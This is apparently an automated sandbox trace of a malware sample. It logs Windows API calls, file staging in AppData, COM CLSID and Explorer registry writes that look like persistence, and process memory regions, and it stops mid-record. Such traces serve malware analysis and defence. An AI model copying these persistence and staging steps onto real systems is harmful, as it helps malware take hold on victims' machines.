SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.501] GetLastError () returned 0x0 [0035.501] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.502] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.502] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.502] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.502] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.502] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.502] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.502] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.502] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.502] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.502] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.502] SetLastError (dwErrCode=0x0) [0035.502] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.503] SetLastError (dwErrCode=0x0) [0035.503] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.504] SetLastError (dwErrCode=0x0) [0035.504] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.505] GetLastError () returned 0x0 [0035.505] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.506] SetLastError (dwErrCode=0x0) [0035.506] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.507] GetLastError () returned 0x0 [0035.507] SetLastError (dwErrCode=0x0) [0035.508] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.508] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.508] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.509] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f5f8 | out: lpSystemTimeAsFileTime=0x16f5f8*(dwLowDateTime=0xe2da41f0, dwHighDateTime=0x1d3dfba)) [0035.509] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f530, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.509] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f418, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.509] GetLastError () returned 0x0 [0035.510] GetLastError () returned 0x0 [0035.510] GetLastError () returned 0x0 [0035.510] GetLastError () returned 0x0 [0035.510] GetLastError () returned 0x0 [0035.510] GetLastError () returned 0x0 [0035.510] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.510] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.510] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.510] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.510] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.510] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.510] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.510] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.510] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.510] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.510] GetLastError () returned 0xb7 [0035.510] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.510] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.510] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.510] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.510] wsprintfA (in: param_1=0x16f298, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.510] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.510] wsprintfA (in: param_1=0x16f194, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.511] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.511] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.511] CloseHandle (hObject=0x74) returned 1 [0035.511] GetLastError () returned 0x0 [0035.511] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.511] GetLastError () returned 0x0 [0035.511] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.511] GetSystemDirectoryA (in: lpBuffer=0x16f298, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.511] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.511] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.511] CloseHandle (hObject=0x74) returned 1 [0035.511] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.511] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.511] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.513] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.513] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.513] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.513] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.513] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0035.513] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.513] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.513] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.513] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0035.513] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.513] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.513] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.513] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.513] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.514] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.515] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.515] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.515] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.515] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.515] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.515] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.515] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.515] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.515] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.516] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.516] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.516] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.516] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.516] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.516] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.516] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.516] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.516] GetVersionExW (in: lpVersionInformation=0x16f81c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16f81c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0035.516] GetLastError () returned 0x7f [0035.516] SetLastError (dwErrCode=0x7f) [0035.516] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Classes\\CLSID\\\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\InprocServer32", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x16f510, lpdwDisposition=0x0 | out: phkResult=0x16f510*=0x7c, lpdwDisposition=0x0) returned 0x0 [0035.516] RegSetValueExW (in: hKey=0x7c, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="explorer.exe", cbData=0x1a | out: lpData="explorer.exe") returned 0x0 [0035.516] GetLastError () returned 0x7f [0035.516] GetLastError () returned 0x7f [0035.516] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x16f61c, lpdwDisposition=0x16f778 | out: phkResult=0x16f61c*=0x80, lpdwDisposition=0x16f778*=0x2) returned 0x0 [0035.516] RegSetValueExA (in: hKey=0x80, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x16f620*=0xe10, cbData=0x4 | out: lpData=0x16f620*=0xe10) returned 0x0 [0035.516] RegSetValueExA (in: hKey=0x80, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x16f620*=0x1, cbData=0x4 | out: lpData=0x16f620*=0x1) returned 0x0 [0035.517] RegSetValueExA (in: hKey=0x80, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x72ee31d4*, cbData=0x2 | out: lpData=0x72ee31d4*) returned 0x0 [0035.517] RegSetValueExA (in: hKey=0x80, lpValueName="Plgv", Reserved=0x0, dwType=0x3, lpData=0x16f6c4*, cbData=0x58 | out: lpData=0x16f6c4*) returned 0x0 [0035.517] RegSetValueExA (in: hKey=0x80, lpValueName="Plpv", Reserved=0x0, dwType=0x3, lpData=0x16f71c*, cbData=0x5c | out: lpData=0x16f71c*) returned 0x0 [0035.517] RegSetValueExA (in: hKey=0x80, lpValueName="ISFValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0035.517] RegSetValueExA (in: hKey=0x80, lpValueName="ISRValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0035.517] RegCloseKey (hKey=0x80) returned 0x0 [0035.518] HeapDestroy (hHeap=0x1360000) returned 1 Process: id = "58" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f380" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"iexplore.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2545 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2546 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2547 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2548 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2549 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2550 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2551 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2552 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2553 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 2554 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2555 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2556 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2557 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2558 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2559 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2560 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2561 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = 